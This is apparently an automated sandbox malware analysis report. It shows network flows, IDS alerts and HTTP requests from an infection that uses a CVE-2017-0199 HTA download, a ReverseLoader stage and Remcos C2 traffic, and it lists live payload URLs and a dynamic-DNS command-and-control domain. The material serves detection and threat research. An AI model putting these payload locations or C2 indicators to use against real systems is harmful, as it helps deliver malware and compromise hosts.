                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 31.13.224.72:2412
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 31.13.224.72:2412
                  Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.234.205.135:80 -> 192.168.2.22:49173
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.234.205.135:80 -> 192.168.2.22:49173
                  Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.234.205.135:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.234.205.135:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.234.205.135:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.234.205.135:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.234.205.135:80 -> 192.168.2.22:49173
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.234.205.135:80 -> 192.168.2.22:49173
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.22:49168
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.22:49172
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: newbeggin.duckdns.org
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: newbeggin.duckdns.org
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 31.13.224.72:2412
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/SRVRSR.txt HTTP/1.1Host: 172.234.205.135Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /1244/SRVRSR.txt HTTP/1.1Host: 172.234.205.135Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 198.244.140.41 198.244.140.41
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox ViewASN Name: SARNICA-ASBG SARNICA-ASBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 172.234.205.135:80
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.234.205.135Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.234.205.135If-Range: "1e074-627bb40d70f1b"
                  Source: global trafficHTTP traffic detected: GET /1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.234.205.135Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 25 Nov 2024 11:44:20 GMTConnection: Keep-AliveHost: 172.234.205.135If-None-Match: "1e074-627bb40d70f1b"
                  Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
